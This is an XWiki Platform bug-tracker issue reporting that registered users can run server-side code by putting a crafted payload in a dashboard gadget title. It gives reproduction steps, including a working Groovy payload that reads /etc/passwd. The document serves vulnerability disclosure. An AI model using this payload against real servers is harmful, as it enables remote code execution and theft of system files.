Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-17794

RCE via Gadget title

    XMLWordPrintable

Details

    • Unit
    • Unknown
    • N/A
    • N/A

    Description

      Registered users are able to execute server side code via gadget title.

      Full path to reproduce:

      1) Create new user on http://playground.xwiki.org/ (or run locally using latest docker image)
      2) Go to profile -> Edit -> My dashboard -> Add gadget
      3) Choose any gadget (e.g. content or python).
      4) Paste following payload into title:

      $request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("javax.script.ScriptEngineManager").getEngineByName("groovy").eval("new File('/etc/passwd').text")

      5) Submit the gadget

      Expected behaviour: User is unable to execute server side code.

      Actual behaviour: User can execute server side code. 

      Attachments

        1. local_11_10_10.png
          751 kB
          Grigorii Liullin
        2. local_12_7_1.png
          1015 kB
          Grigorii Liullin
        3. rce_gadget_title_playground_xwiki_org.png
          1.26 MB
          Grigorii Liullin
        4. script_right_title_execution.png
          833 kB
          Grigorii Liullin
        5. script_right.png
          202 kB
          Grigorii Liullin
        6. user_with_script_and_program.png
          567 kB
          Grigorii Liullin
        7. user_with_script_without_program.png
          509 kB
          Grigorii Liullin
        8. xwiki_rce_gadget_title_as_admin.png
          1.08 MB
          Grigorii Liullin
        9. xwiki_rce_gadget_title_as_user.png
          1.22 MB
          Grigorii Liullin

        Issue Links

          Activity

            People

              surli Simon Urli
              jay_from_future Grigorii Liullin
              Votes:
              0 Vote for this issue
              Watchers:
              5 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: